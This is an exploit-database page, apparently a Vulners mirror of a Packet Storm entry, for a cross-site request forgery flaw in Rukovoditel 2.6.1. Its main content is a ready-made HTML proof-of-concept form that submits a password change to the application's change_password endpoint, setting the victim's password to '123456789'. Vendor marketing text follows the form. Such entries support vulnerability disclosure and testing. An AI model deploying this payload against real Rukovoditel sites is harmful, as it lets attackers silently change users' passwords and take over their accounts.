Lucene search
K

Rukovoditel 2.6.1 Cross Site Request Forgery

🗓️ 14 Dec 2020 00:00:00Reported by KeopssGroup0day IncType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 328 Views

Rukovoditel 2.6.1 Cross-Site Request Forgery (CSRF) allows unauthorized password chang

Code
`# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)  
# Date: 2020-12-14  
# Exploit Author: KeopssGroup0day,Inc  
# Vendor Homepage: https://www.rukovoditel.net/  
# Software Link: https://www.rukovoditel.net/download.php  
# Version: v2.6.1  
# Tested on: Kali Linux  
  
POC(localhost/index.php?module=users/change_password):  
  
<html>  
<!-- CSRF PoC -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form   
action="https://localhost/index.php?module=users/change_password&action=change"   
method="POST">  
<input type="hidden" name="form_session_token"   
value="D^HUyTDh0X" />  
<input type="hidden" name="password_new" value="123456789" />  
<input type="hidden" name="password_confirmation"   
value="123456789" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
--  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Dec 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
328